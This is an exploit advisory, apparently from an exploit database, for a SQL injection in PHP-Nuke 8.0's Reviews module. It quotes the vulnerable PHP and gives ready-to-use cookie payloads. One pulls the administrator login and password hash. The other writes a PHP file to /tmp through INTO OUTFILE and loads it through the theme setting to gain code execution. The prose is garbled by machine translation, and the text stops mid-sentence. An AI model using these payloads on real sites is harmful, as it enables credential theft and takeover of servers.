==================================== PHP-Nuke <= 8.0 SQL-Inj3ct0r Exploit ==================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Product: PHP-Nuke Version: 8.0 site: rus-phpnuke.com /modules/Reviews/index.php Vulnerable code: $uname = filter($cookie[1], "nohtml"); $id = intval($id); $score = intval($score); if (is_user($user)) { $krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'")); if ($krow['karma'] == 2) { $db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')"); include("header.php"); title(""._MODERATEDTITLE.""); OpenTable(); echo "
"._COMMENTMODERATED.""; echo "

"._MODERATEDTITLE.""; CloseTable(); include("footer.php"); die(); } elseif ($krow['karma'] == 3) { Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id"); die(); } } $db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')"); ------------------------ Here there once 2 sql-inj3ct0r, to select and insert queries, after raskadirovki Cookie is sleshirovanie data, but in this code snippet, data from $ cookie [1] fall into the filter ------------------------ function filter($what, $strip="", $save="", $type="") { if ($strip == "nohtml") { $what = check_html($what, $strip); // $what = htmlentities(trim($what), ENT_QUOTES); // If the variable $what doesn't comes from a preview screen should be converted if ($type != "preview" AND $save != 1) { $what = html_entity_decode($what, ENT_QUOTES); } } if ($save == 1) { $what = check_words($what); $what = check_html($what, $strip); if (!get_magic_quotes_gpc()) { $what = addslashes($what); } } else { $what = stripslashes(FixQuotes($what,$strip)); $what = check_words($what); $what = check_html($what, $strip); } return($what); } ------------------------------- and thence to filter check_html ------------------------------- function check_html ($str, $strip="") { /* The core of this code has been lifted from phpslash */ /* which is licenced under the GPL. */ include("config.php"); if ($strip == "nohtml") $AllowableHTML=array(''); $str = stripslashes($str); $str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str); // Delete all spaces from html tags . $str = eregi_replace("]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'', $str); // Delete all attribs from Anchor, except an href, double quoted. $str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str); // Delete all img tags $str = eregi_replace("]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str); // Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com $tmp = ""; while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) { $i = strpos($str,$reg[0]); $l = strlen($reg[0]); if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1)); else $tag = strtolower($reg[1]); if ($a = $AllowableHTML[$tag]) if ($reg[1][0] == "/") $tag = ""; elseif (($a == 1) || ($reg[2] == "")) $tag = "<$tag>"; else { # Place here the double quote fix function. $attrb_list=delQuotes($reg[2]); // A VER //$attrb_list = ereg_replace("&","&",$attrb_list); $tag = "<$tag" . $attrb_list . ">"; } # Attribs in tag allowed else $tag = ""; $tmp .= substr($str,0,$i) . $tag; $str = substr($str,$i+$l); } $str = $tmp . $str; return $str; exit; /* Squash PHP tags unconditionally */ $str = ereg_replace("<\?","",$str); return $str; } where shielding escaped successfully removed, so it becomes possible to implement our sql code, through the cheekbones to select the data output can not, therefore, used inj3ct0r to insert Come in /modules.php?name=Reviews&rop=showcontent&id=1 choose any review, click "Insert comment" throw in a cookie base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096) Click submit, as a result we get the login: hash admin But over the cheekbones to select when file_priv can fill shell, throw in a cookie: base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096) Then the path can not disclose, pour in tmp, and then simply poured through the shell templetes, for this go to /modules.php?Name=Your_Account&op=chgtheme Human SORS, where it is written the name of the topic, in my case, value = RusNuke2003 write: